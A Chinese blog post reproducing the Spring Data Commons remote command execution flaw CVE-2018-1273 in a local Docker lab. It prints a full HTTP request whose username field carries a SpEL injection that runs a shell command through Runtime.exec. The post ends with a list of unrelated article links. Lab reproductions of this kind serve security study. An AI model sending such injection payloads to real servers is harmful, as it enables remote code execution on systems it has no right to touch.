您现在的位置是:首页 > 正文

Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)复现

2024-02-01 01:24:10阅读 2

1.通过"docker-compose build"和"docker-compose up -d"拉取环境

在这里插入图片描述刚开始直接敲命令docker-compose build出错,最后发现是未启动docker,所以通过systemctl start docker命令启动docker

2.访问服务器ip:8080/users看环境是否成功

在这里插入图片描述

3.注册时抓包,并修改成如下数据包:

POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

在这里插入图片描述

4.查看是否成功

执行docker-compose exec spring bash进入容器中,可见成功创建/tmp/success,说明成功了
在这里插入图片描述

5.退出并关闭docker环境

exit,再输入sudo docker-compose down
在这里插入图片描述

网站文章

  • 郑州大学计算机应用基础测试题,郑州大学《计算机应用基础》网上考试习题.pdf...

    精品文档一、单项选择题( 30 道小题,共 60 分)1、在 PowerPoint 的数据表中,数字默认是( )。 (2 分)A、左对齐 B、右对齐C、居中 D、两端对齐2 、提供不可靠传输...

    2024-02-01 01:24:02
  • 三跨计算机考研学校推荐,考研实现三跨—跨学校,跨地区,跨学科现实吗?

    三跨计算机考研学校推荐,考研实现三跨—跨学校,跨地区,跨学科现实吗?

    原标题:考研实现三跨—跨学校,跨地区,跨学科现实吗?个人认为:不现实,比较传奇。三跨生是指:在全国硕士研究生招生考试中,通过跨学校(学校层次不同)、跨地区(两地之间发展水平不同,且地理距离较远)、跨学...

    2024-02-01 01:23:32
  • java的HashSet

    java的HashSet

    文章目录java的HashSetHashSet的增删查增(add)删(remove)查(contains)HashSet的迭代HashSet的长度(size()) java的HashSet HashS...

    2024-02-01 01:23:24
  • 流程控制 if----else

    流程控制: 对PHP程序执行的过程进行控制! PHP有哪些手段对程序执行过程进行控制!一、顺序执行 自上而下的执行即可! 对这个执行过程没有控制!二、分支执行 分支执行可以根据条件是否满足来选择执行某些代码,PHP的分支执行主要通过两种语句(if,switch)来实现! 1.if语句 注意:我们if语句的表达式所控制的代码,最好用花括号括起来,哪怕就是一条语句也用花括号括起来! ...

    2024-02-01 01:23:17
  • 一天吃透消息队列面试八股文

    一天吃透消息队列面试八股文

    有些特殊框架(如:redis、kafka、zeroMq等)根据自身需要未严格遵循MQ规范,而是基于TCP\IP自行封装了一套协议,通过网络socket接口进行传输,实现了MQ的功能。

    2024-02-01 01:22:49
  • Codeforces Round #627 (Div. 3)题解

    Codeforces Round #627 (Div. 3)题解

    A. Yet Another Tetris Problem 题目 time limit per test 2 seconds memory limit per test 256 megabytes i...

    2024-02-01 01:22:42
  • (11)web安全|渗透测试|网络安全 漏洞挖掘的重点环节及基础知识

    (11)web安全|渗透测试|网络安全 漏洞挖掘的重点环节及基础知识

    (11)web安全|渗透测试|网络安全 漏洞挖掘的重点环节及基础知识

    2024-02-01 01:22:36
  • vCenter 服务器漏洞可导致代码执行和认证绕过

    vCenter 服务器漏洞可导致代码执行和认证绕过

    聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士VMware 修复了位于 vCenter Server 中的多个高危漏洞,可导致攻击者获得代码执行权限并绕过未修复系统上的认证。vCenter Ser...

    2024-02-01 01:22:07
  • 解决实现虚拟机win10与主机文件的共享问题

    解决实现虚拟机win10与主机文件的共享问题

    2024-02-01 01:21:59
  • class二进制文件解析(一)

    class二进制文件解析(一)

    class文件创建及解析创建项目结构:#项目名称testclassmkdir testClass#进入相应目录cd testClass#源码目录mkdir src#输出目录mkdir out#进入源码...

    2024-02-01 01:21:51